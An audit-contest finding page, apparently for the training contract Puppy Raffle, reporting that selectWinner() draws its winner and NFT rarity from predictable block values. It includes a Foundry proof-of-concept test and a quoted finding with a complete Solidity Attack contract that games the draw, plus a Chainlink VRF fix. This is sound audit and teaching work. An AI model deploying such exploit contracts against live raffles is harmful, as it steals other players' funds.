Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Predictable on-chain randomness in selectWinner() lets an attacker choose the winner and rarity

Root + Impact

  • Missing secure randomness in selectWinner(): the winner index and the NFT rarity are derived from public, caller-influenced on-chain values, so an attacker can deterministically win the entire prize pool and mint the rarest puppy at will.

Description

  • selectWinner() is meant to draw an unpredictable winner from the players array once the raffle duration has passed, and to mint that winner a puppy whose rarity is also randomly assigned.

  • Both the winner index and the rarity are computed by hashing msg.sender, block.timestamp, and block.difficulty. All three values are known to the transaction sender and can be influenced by the block validator before the call is mined, so both outcomes are fully predictable and can be forced.

@> uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
// ...
@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood:

  • A player computes winnerIndex off-chain for the pending block and broadcasts selectWinner() only in a block where it resolves to their own index.

  • A block validator can additionally adjust block.timestamp / block.difficulty or reorder the transaction to force a chosen winner.

Impact:

  • The attacker deterministically takes the 80% prize pool that should go to a fair, random winner.

  • The attacker mints the rarest (legendary) NFT on demand, destroying the intended rarity distribution.

Proof of Concept

  • The following Foundry test reproduces the winner index off-chain using the exact formula the contract uses, then confirms the attacker wins deterministically. The same technique lets the attacker force the rarity result to "legendary."

function test_AttackerForcesWin() public {
// 4 entrants so the raffle can be drawn; attacker is index 0
address[] memory entrants = new address[](4);
entrants[0] = attacker;
entrants[1] = bob;
entrants[2] = carol;
entrants[3] = dave;
puppyRaffle.enterRaffle{value: entranceFee * 4}(entrants);
vm.warp(block.timestamp + duration + 1); // raffle is now over
// Attacker reproduces the contract's exact formula off-chain:
uint256 predicted = uint256(
keccak256(abi.encodePacked(attacker, block.timestamp, block.difficulty))
) % 4;
// They only submit in a block where the prediction equals their index (0 here).
assertEq(predicted, 0);
vm.prank(attacker);
puppyRaffle.selectWinner();
// The attacker wins with certainty — no luck involved.
assertEq(puppyRaffle.previousWinner(), attacker);
}

Recommended Mitigation

  • Use Chainlink VRF as the randomness source. VRF returns randomness that no participant or validator can predict or influence, so neither the winner nor the rarity can be gamed. On-chain block values (block.timestamp, block.difficulty) and msg.sender must never be used to seed randomness.

- uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
+ // Request a random word from Chainlink VRF and use it as the source of randomness:
+ uint256 winnerIndex = vrfRandomWord % players.length;
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!